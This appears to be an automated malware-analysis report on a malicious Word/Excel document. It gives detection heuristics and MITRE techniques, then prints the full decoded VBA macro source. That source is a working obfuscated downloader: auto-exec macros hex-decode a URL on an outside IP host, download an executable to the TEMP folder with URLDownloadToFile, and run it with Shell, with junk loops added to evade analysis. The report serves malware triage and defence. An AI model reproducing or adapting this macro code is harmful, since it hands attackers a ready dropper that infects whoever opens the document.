MALICIOUS
448
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro triggers the execution of a function that utilizes the URLDownloadToFile API to download a second-stage payload. This indicates a downloader functionality, commonly associated with malware distribution.
Heuristics 14
-
ClamAV: Doc.Downloader.Macr-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macr-2
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
dsfdsf = Shell(jghdfdfdfw, 1) -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _ -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
dsfdsf = Shell(jghdfdfdfw, 1) -
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URLA VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://216.59.16.87:8080/mopsi/popsi.php Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7798 bytes |
SHA-256: 0a91e503340e475d5071b67010c5840acd5e822c9aa3b30de27100718e088ca7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
79 of 128 identifiers look randomly generated (e.g. 'UGivgHgfdg') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As LongPtr, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As LongPtr) As LongPtr
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal sdfdsf As Long, _
ByVal dfsdfew As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
#End If
Sub uiwefds()
Dim PxxgBiNP As Integer
For PxxgBiNP = 0 To 3
Dim NIlZJTAZ As Integer
For NIlZJTAZ = 0 To 2
Dim SkHXFUCU As Integer
For SkHXFUCU = 0 To 9
DoEvents
Next SkHXFUCU
DoEvents
Next NIlZJTAZ
Dim kPqjFzTg As Integer
For kPqjFzTg = 0 To 5
DoEvents
Next kPqjFzTg
DoEvents
Next PxxgBiNP
Dim kYYYffQc As Integer
For kYYYffQc = 0 To 5
Dim ZwNyFHMZ As Integer
For ZwNyFHMZ = 0 To 1
DoEvents
Next ZwNyFHMZ
DoEvents
Next kYYYffQc
Dim iFwnFpAo As Integer
For iFwnFpAo = 0 To 6
DoEvents
Next iFwnFpAo
UGivgHgfdg
End Sub
Sub AutoOpen()
Dim bFcsplDg As Integer
For bFcsplDg = 0 To 7
Dim ShzVbLyO As Integer
For ShzVbLyO = 0 To 5
Dim oQYYiVIE As Integer
For oQYYiVIE = 0 To 9
DoEvents
Next oQYYiVIE
DoEvents
Next ShzVbLyO
Dim zbpkQrDX As Integer
For zbpkQrDX = 0 To 8
DoEvents
Next zbpkQrDX
DoEvents
Next bFcsplDg
Dim kIxlbfDj As Integer
For kIxlbfDj = 0 To 2
Dim dpNiQKzp As Integer
For dpNiQKzp = 0 To 1
DoEvents
Next dpNiQKzp
DoEvents
Next kIxlbfDj
Dim uVEKhVuZ As Integer
For uVEKhVuZ = 0 To 9
DoEvents
Next uVEKhVuZ
uiwefds
End Sub
Sub Workbook_Open()
Dim ftvowRbL As Integer
For ftvowRbL = 0 To 1
Dim fipkKjzB As Integer
For fipkKjzB = 0 To 4
Dim XyjJYqDQ As Integer
For XyjJYqDQ = 0 To 2
DoEvents
Next XyjJYqDQ
DoEvents
Next fipkKjzB
Dim ZvQsURmk As Integer
For ZvQsURmk = 0 To 7
DoEvents
Next ZvQsURmk
DoEvents
Next ftvowRbL
Dim YaKQIzva As Integer
For YaKQIzva = 0 To 8
Dim zbuUTilv As Integer
For zbuUTilv = 0 To 5
DoEvents
Next zbuUTilv
DoEvents
Next YaKQIzva
Dim WfPlofvJ As Integer
For WfPlofvJ = 0 To 4
DoEvents
Next WfPlofvJ
uiwefds
End Sub
Sub UGivgHgfdg()
Dim sjACsOEZ As Integer
For sjACsOEZ = 0 To 1
Dim PbqsdXKI As Integer
For PbqsdXKI = 0 To 2
Dim OYRHxAZy As Integer
For OYRHxAZy = 0 To 8
DoEvents
Next OYRHxAZy
DoEvents
Next PbqsdXKI
Dim ZliAaUUv As Integer
For ZliAaUUv = 0 To 7
DoEvents
Next ZliAaUUv
DoEvents
Next sjACsOEZ
Dim hJYYdjbg As Integer
For hJYYdjbg = 0 To 7
Dim jHPjjUXQ As Integer
For jHPjjUXQ = 0 To 7
DoEvents
Next jHPjjUXQ
DoEvents
Next hJYYdjbg
Dim pRfzMFar As Integer
For pRfzMFar = 0 To 6
DoEvents
Next pRfzMFar
dgjkhsd = HexToString("6874")
hdsfhjk = HexToString("74703A2F2F")
dhjkfsd = HexToString("3231362E35392E31362E38373A383038302F6D6F7073692F706F7073692E706870")
ewrwedsf = dgjkhsd + hdsfhjk + dhjkfsd
Dim mgubxnIb As Integer
For mgubxnIb = 0 To 8
Dim YMlEFDdK As Integer
For YMlEFDdK = 0 To 2
Dim XqVdlrWe As Integer
For XqVdlrWe = 0 To 5
DoEvents
Next XqVdlrWe
DoEvents
Next YMlEFDdK
Dim GVZVCpNw As Integer
For GVZVCpNw = 0 To 6
DoEvents
Next GVZVCpNw
DoEvents
Next mgubxnIb
Dim ddFVFiMb As Integer
For ddFVFiMb = 0 To 8
Dim HGgNeqLB As Integer
For HGgNeqLB = 0 To 6
DoEvents
Next HGgNeqLB
DoEvents
Next ddFVFiMb
Dim VVaaqewe As Integer
For VVaaqewe = 0 To 7
DoEvents
Next VVaaqewe
jghdfdfdfw = Environ(HexToString("54454D50")) & HexToString("5C657267667265672E657865")
Dim JIXksrqo As Integer
For JIXksrqo = 0 To 6
Dim ZmuZuJAA As Integer
For ZmuZuJAA = 0 To 7
Dim wpZWyUKh As Integer
For wpZWyUKh = 0 To 8
DoEvents
Next wpZWyUKh
DoEvents
Next ZmuZuJAA
Dim RsHNlmzh As Integer
For RsHNlmzh = 0 To 7
DoEvents
Next RsHNlmzh
DoEvents
Next JIXksrqo
Dim wiPdQCYM As Integer
For wiPdQCYM = 0 To 6
Dim MvQkzilR As Integer
For MvQkzilR = 0 To 1
DoEvents
Next MvQkzilR
DoEvents
Next wiPdQCYM
Dim aUclpNWO As Integer
For aUclpNWO = 0 To 2
DoEvents
Next aUclpNWO
wqewr = URLDownloadToFile(0&, ewrwedsf, jghdfdfdfw, 0&, 0&)
Dim dsfdsf
Dim xajSsvKH As Integer
For xajSsvKH = 0 To 3
Dim XotIOnTN As Integer
For XotIOnTN = 0 To 4
Dim QcgeTjsF As Integer
For QcgeTjsF = 0 To 2
DoEvents
Next QcgeTjsF
DoEvents
Next XotIOnTN
Dim LAclisaB As Integer
For LAclisaB = 0 To 3
DoEvents
Next LAclisaB
DoEvents
Next xajSsvKH
Dim GCOldYPl As Integer
For GCOldYPl = 0 To 3
Dim xpAyowIw As Integer
For xpAyowIw = 0 To 6
DoEvents
Next xpAyowIw
DoEvents
Next GCOldYPl
Dim toTFvQyC As Integer
For toTFvQyC = 0 To 3
DoEvents
Next toTFvQyC
dsfdsf = Shell(jghdfdfdfw, 1)
End Sub
Public Function HexToString(ByVal dsfGHJsdf As String) As String
Dim cRFBGXaI As Integer
For cRFBGXaI = 0 To 3
Dim lqCjoUhY As Integer
For lqCjoUhY = 0 To 5
Dim fJrXjdhr As Integer
For fJrXjdhr = 0 To 7
DoEvents
Next fJrXjdhr
DoEvents
Next lqCjoUhY
Dim ibrXgwUZ As Integer
For ibrXgwUZ = 0 To 6
DoEvents
Next ibrXgwUZ
DoEvents
Next cRFBGXaI
Dim xDNrzEzH As Integer
For xDNrzEzH = 0 To 8
Dim JmAtuSal As Integer
For JmAtuSal = 0 To 1
DoEvents
Next JmAtuSal
DoEvents
Next xDNrzEzH
Dim BEgugREc As Integer
For BEgugREc = 0 To 2
DoEvents
Next BEgugREc
For y = 1 To Len(dsfGHJsdf)
Dim AuJDUKFJ As Integer
For AuJDUKFJ = 0 To 4
Dim UvHMzkjr As Integer
For UvHMzkjr = 0 To 1
Dim fHuPigTW As Integer
For fHuPigTW = 0 To 5
DoEvents
Next fHuPigTW
DoEvents
Next UvHMzkjr
Dim uRPwSwPf As Integer
For uRPwSwPf = 0 To 6
DoEvents
Next uRPwSwPf
DoEvents
Next AuJDUKFJ
Dim ezQsDXjM As Integer
For ezQsDXjM = 0 To 3
Dim WadqawBn As Integer
For WadqawBn = 0 To 4
DoEvents
Next WadqawBn
DoEvents
Next ezQsDXjM
Dim dVvhcepx As Integer
For dVvhcepx = 0 To 4
DoEvents
Next dVvhcepx
num = Mid(dsfGHJsdf, y, 2)
Dim PyxhKOLG As Integer
For PyxhKOLG = 0 To 2
Dim hZmZJOoa As Integer
For hZmZJOoa = 0 To 2
Dim ivsfJuvt As Integer
For ivsfJuvt = 0 To 9
DoEvents
Next ivsfJuvt
DoEvents
Next hZmZJOoa
Dim FQeVqElL As Integer
For FQeVqElL = 0 To 6
DoEvents
Next FQeVqElL
DoEvents
Next PyxhKOLG
Dim psmZGKbn As Integer
For psmZGKbn = 0 To 1
Dim AdqmlHZR As Integer
For AdqmlHZR = 0 To 4
DoEvents
Next AdqmlHZR
DoEvents
Next psmZGKbn
Dim maFtCXUC As Integer
For maFtCXUC = 0 To 2
DoEvents
Next maFtCXUC
uGHdsf = uGHdsf & Chr(CDbl("&h" & num))
Dim ibsiUdwv As Integer
For ibsiUdwv = 0 To 7
Dim sVEHRGPJ As Integer
For sVEHRGPJ = 0 To 4
Dim uUvhwdnW As Integer
For uUvhwdnW = 0 To 3
DoEvents
Next uUvhwdnW
DoEvents
Next sVEHRGPJ
Dim NmeaNlTf As Integer
For NmeaNlTf = 0 To 2
DoEvents
Next NmeaNlTf
DoEvents
Next ibsiUdwv
Dim yQiniWGp As Integer
For yQiniWGp = 0 To 6
Dim sagylpuI As Integer
For sagylpuI = 0 To 4
DoEvents
Next sagylpuI
DoEvents
Next yQiniWGp
Dim yFKJVhsa As Integer
For yFKJVhsa = 0 To 6
DoEvents
Next yFKJVhsa
y = y + 1
Next y
Dim pswwxpTG As Integer
For pswwxpTG = 0 To 4
Dim bwEKlAom As Integer
For bwEKlAom = 0 To 1
Dim dBxcXWVq As Integer
For dBxcXWVq = 0 To 8
DoEvents
Next dBxcXWVq
DoEvents
Next bwEKlAom
Dim TJtJSTmd As Integer
For TJtJSTmd = 0 To 4
DoEvents
Next TJtJSTmd
DoEvents
Next pswwxpTG
Dim yImZDVeo As Integer
For yImZDVeo = 0 To 7
Dim LoRMzhbw As Integer
For LoRMzhbw = 0 To 7
DoEvents
Next LoRMzhbw
DoEvents
Next yImZDVeo
Dim bxwRxDlo As Integer
For bxwRxDlo = 0 To 3
DoEvents
Next bxwRxDlo
HexToString = uGHdsf
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.